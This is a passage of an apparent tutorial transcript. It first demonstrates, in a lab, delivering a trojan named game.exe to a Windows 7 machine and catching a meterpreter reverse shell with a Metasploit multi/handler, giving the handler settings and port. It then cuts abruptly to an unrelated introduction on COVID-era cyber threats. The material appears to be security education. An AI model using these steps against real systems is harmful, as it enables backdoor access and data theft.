accessible. So if you remember, the IP address of that machine was 192.168.71.133, and we were in the shared folder. 192.168.71.133 shared, and if this is done properly, we should see the game.exe right here. And once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we're going to save it, and I'm going to save it on I think it just saved it here. And now before we execute it, we are going to go back into Kali Linux, and we are now going to start the listener. Right, so we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine. But our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with MSF console. Now MSF console is the command which starts up Metasploit. Right, so we're just going to take a minute over here. You can see it's Metasploit framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. I can see at the bottom left, we are on MSF on the MSF prompt. We are using Metasploit with 1,699 exploits. Now this is not the completely updated version. The latest one would have around 1,800 exploits, but the one that we want is exists in this version, so we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating systems. And we're going to use that exploit, and you can see it's now opening up the handler which we need to configure. And here we're going to set the payload that it is going to expect, the payload being Windows meterpreter reverse underscore TCP. You can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. And you can see we had by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here that says set lhost equals 192.168.71.133. Enter, and I think I did a typo, so there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If we want to set the L port, that's how we do it. We had 4444, and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we're going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something, and at the other end, you can see that a meterpreter session has been opened, and it shows us that from the victim's IP, which is 71.129 on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter, and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens. And you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website. Right, so that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor, so we can do anything and everything that we want to do.
Just like how the COVID-19 situation is affecting various domains, it is also adversely affecting cybersecurity. Interpol states that attackers are attacking computer networks and systems of businesses, individuals, and big global organizations. Due to the shift of focus to the COVID crisis, cybersecurity is taking a huge brunt. Even WHO has stated that from the beginning of this pandemic, it has witnessed a sky-high increase in the number of cyber attacks. There are fake emails doing the rounds in which scammers are impersonating WHO. Reports also state that the financial services sector is increasingly being targeted during the COVID-19 coronavirus pandemic. Various banks and financial institutions have witnessed a spike in the number of cyber attacks in the last few months. Several banks are increasing cyber attack awareness amongst their customers and also asking them not to disclose any confidential information to a third party. Now that we have an idea as to how cyber attacks can affect us, let's go ahead and understand the meaning of a cyber threat. A cyber threat is a warning which allows you to prepare against a cyber attack. When there is an unauthorized access by a third party to your system and network, it is termed as a cyber attack. The person who carries this out is termed as a hacker or an attacker or a cyber criminal. A possibility of such an attack is termed as a cyber threat. As we saw previously, cyber attacks lead to data breaches which result in either data manipulation or loss of highly confidential data. It also results in financial losses, and which in turn has a colossal impact on the businesses. In addition to these losses, a lot of companies face reputational damages as well. Trust plays a vital role when it comes to customer relationships. Cyber attacks can hamper an organization's reputation and erode the customer's trust. Let's now get an understanding of the most common cyber attacks. Here, we will look into the top 10 cyber threats in today's times.